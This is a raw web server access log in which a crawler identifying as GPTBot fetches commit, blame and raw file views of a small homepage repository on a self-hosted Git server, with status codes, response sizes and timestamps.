"/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" -[17/Feb/2026:13:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 10321] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" -[17/Feb/2026:13:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" -[17/Feb/2026:13:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" -[17/Feb/2026:13:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" -[17/Feb/2026:13:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" -[17/Feb/2026:13:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" -[17/Feb/2026:13:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 10824] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" -[17/Feb/2026:13:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" -[17/Feb/2026:13:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 10776] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" -[17/Feb/2026:13:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 74.7.227.38] [Length 10727] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" -[17/Feb/2026:13:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" -[17/Feb/2026:13:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx" -[17/Feb/2026:13:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 11888] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 22640] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 11002] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 11818] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 11637] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 32408] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:13:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" -[17/Feb/2026:13:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" -[17/Feb/2026:13:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 16517] [Gzip 7.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:13:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 11203] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" -[17/Feb/2026:13:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 9835] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:13:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 9844] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" -[17/Feb/2026:13:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 9832] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" -[17/Feb/2026:13:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 11154] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" -[17/Feb/2026:13:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 9830] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" -[17/Feb/2026:13:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 10687] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 10920] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" -[17/Feb/2026:13:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 25718] [Gzip 12.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:13:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 74.7.227.38] [Length 21952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:13:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" -[17/Feb/2026:13:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/vite.config.ts" -[17/Feb/2026:13:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 9960] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" -[17/Feb/2026:13:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" -[17/Feb/2026:13:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" -[17/Feb/2026:13:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 50253] [Gzip 13.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" -[17/Feb/2026:13:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 47165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 30964] [Gzip 9.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 32587] [Gzip 9.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 30914] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 15697] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" -[17/Feb/2026:13:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 16513] [Gzip 7.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" -[17/Feb/2026:13:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 38014] [Gzip 9.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 16456] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" -[17/Feb/2026:13:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 41653] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 41194] [Gzip 13.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 49951] [Gzip 13.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 10292] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:13:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 10496] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:13:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 10067] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 